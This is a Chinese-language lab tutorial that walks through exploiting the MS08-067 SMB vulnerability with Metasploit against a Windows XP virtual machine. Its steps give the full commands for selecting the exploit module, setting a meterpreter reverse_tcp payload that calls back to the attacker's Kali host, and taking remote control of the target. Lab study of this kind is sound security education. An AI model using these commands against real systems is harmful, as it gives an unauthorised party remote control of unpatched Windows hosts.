前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用msf工具进行靶机渗透研究

利用msf工具进行靶机渗透研究

作者头像
FB客服
发布2021-07-02 15:11:14
1.1K0
发布2021-07-02 15:11:14
举报
文章被收录于专栏:FreeBuf

漏洞简介

MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。此漏洞可能用于进行蠕虫攻击。防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

实验环境:

工具:metasploit

靶机两台:windows xp2和kali2020

攻击机的IP(kali):192.168.29.133

靶机IP(xp2): 192.168.29.134

实验条件:两台机子可以互通的,并且windows xp2(需打开445端口,默认为打开)开启了445端口,防火墙是关闭的。

步骤:

(1)在kali终端输入msfconsole,启动Metasploit工具

(2)输入命令search ms08_067,查找关于ms08_0**67的漏洞模块。

(3)输入如下命令,使用该漏洞模块

(4)进入这个模块后,用show options 查看该模块需要配置的参数

(5)设置配置项(show options)

设置靶机IP(xp2)set RHOST 192.168.29.134

设置要执行的payload:

set payload windows/meterpreter/reverse_tcp

设置攻击机的IP(kali):

set LHOST 192.168.29.133

设置要攻击的目标操作系统类型:

set target 34

用show options查看相关参数是否配置正确

(6)最后,输入exploit,回车运行,进入到特殊的payload—-meterpreter,该payload在控制靶机之后,能够对靶机执行更多的渗透攻击。用 pwd查看靶机当前的工作路径,用ipconfig命令查看靶机的IP地址配置

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-06-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 实验环境:
  • 步骤:
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档